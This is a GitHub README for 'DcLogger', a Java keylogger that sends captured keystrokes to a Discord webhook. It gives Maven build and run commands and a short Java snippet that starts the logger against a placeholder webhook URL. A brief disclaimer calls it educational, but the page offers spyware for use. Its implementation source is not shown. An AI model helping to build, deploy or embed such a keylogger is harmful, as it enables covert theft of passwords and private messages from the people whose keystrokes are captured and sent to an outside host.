Skip to content

Latest commit

 

History

History
48 lines (40 loc) · 2.4 KB

README.md

File metadata and controls

48 lines (40 loc) · 2.4 KB

DcLogger

A simple key logger application which sends the keys to a discord webhook implemented in Java.

Discord

GitHub last commit GitHub commit activity
GitHub code size in bytes GitHub contributors

Disclaimer

Please note, this repository is for educational and proof of concept purposes only. The information and code contained within it should not be used for any illegal or unethical activities. The contributors to this repository are not liable for any actions taken or damages caused by the use of the information or code provided here. It is the responsibility of the user to ensure compliance with all applicable laws and regulations, and to obtain any necessary permissions before using the code or information.

Usage

How to Build and Run Project

Build project:

mvn package

Run ./target/DcLogger-jar-with-dependencies.jar file using command:

java -jar ./target/DcLogger-jar-with-dependencies.jar

The keys will be sent to the provided webhook.

Example

/**
 * This is an example on how to use {@link KeyLogger}.
 *
 * @throws MalformedURLException the exception is going to be thrown if the url is incorrect
 */
public static void main(String[] args) throws MalformedURLException {
    KeyLogger logger = new KeyLogger("WEBHOOK-URL"); // Declares and initializes the keylogger
    logger.start(); // Registers the NativeLogger (If it isn't registered the event will not be called, so nothing would be logged)
}

Bugs and Suggestions

Bug reports and suggestions should be made in this repo's issue tracker using the templates provided. Please provide as much information as you can to best help us understand your issue and give a better chance of it being resolved.

Credits